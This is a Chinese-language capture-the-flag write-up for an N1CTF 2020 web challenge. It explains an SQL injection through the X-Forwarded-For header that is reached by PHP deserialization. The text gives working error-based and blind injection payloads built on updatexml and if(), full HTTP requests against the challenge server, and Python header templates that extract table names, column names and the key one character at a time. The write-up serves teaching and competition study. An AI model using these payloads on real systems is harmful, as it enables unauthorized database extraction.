在$sqlquery=sprintf("INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time());这段代码处可能存在 SQL 注入:X-Forwarded-For 请求头完全由客户端控制,经 waf() 过滤后直接拼接进 SQL 语句。可以通过构造反序列化先到达这一步。
X-Forwarded-For: 1.1.1.1' and updatexml(1,if((1=2),1,concat(0x3a,database())),1) and '1'='
此时 if 判断为 false,实际执行的语句为 INSERT into n1ip(`ip`,`time`) VALUES ('1.1.1.1' and updatexml(1,concat(0x3a,database()),1) and '1'='',time()),后端 SQL 报错信息大概是 XPATH syntax error: ':n1ctf_websign'。错误信息被赋给了 flag 类的 $this->ip,从报错信息中匹配到了 n1ctf,于是这里输出了 welcome to n1ctf2020。
为了方便理解,可以看下面两张图:
接着进行盲注,首先获取表名。由上文可知,只有 if 条件为假时才会触发报错并输出 welcome to n1ctf2020,因此可以以该提示是否出现作为判断依据。
GET /index.php?input=O:4:%22flag%22:1:{s:2:%22ip%22;O:2:%22ip%22:0:{}} HTTP/1.1
Host: 101.32.205.189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
X-Forwarded-For: 1.1.1.1' and updatexml(1,if(((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=10),1,concat(0x3a,database())),1) and '1'='
X-Forwarded-For: 1.1.1.1' and updatexml(1,if(((select table_name from information_schema.tables where table_schema=database() limit 1,1)='n1key'),1,concat(0x3a,database())),1) and '1'='
获取n1key表当中的列名
GET /index.php?input=O:4:%22flag%22:1:{s:2:%22ip%22;O:2:%22ip%22:0:{}} HTTP/1.1
Host: 101.32.205.189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
X-Forwarded-For: 1.1.1.1' and updatexml(1,if(((select length(group_concat(column_name)) from information_schema.columns where table_name='n1key')=6),1,concat(0x3a,database())),1) and '1'='
# Request headers for one probe of the column-name query. `i` and `j` are not
# defined in this excerpt — presumably the substr position and the candidate
# ASCII value supplied by an enclosing loop that is not shown (TODO confirm
# against the full script).
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Cache-Control":"max-age=0","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0","Connection":"close","X-Forwarded-For":"1.1.1.1' and updatexml(1,if(((select ascii(substr(group_concat(column_name),{},1)) from information_schema.columns where table_name='n1key')={}),1,concat(0x3a,database())),1) and '1'='".format(i,j),"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding":"gzip, deflate"}
# Request headers for one probe of the n1key.`key` value. `i` and `j` are not
# defined in this excerpt — presumably the substr position and the candidate
# character supplied by an enclosing loop that is not shown (TODO confirm
# against the full script).
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Cache-Control":"max-age=0","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0","Connection":"close","X-Forwarded-For":"1.1.1.1' and updatexml(1,if(((select substr(`key`,{},1) from n1key)='{}'),1,concat(0x3a,database())),1) and '1'='".format(i,j),"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding":"gzip, deflate"}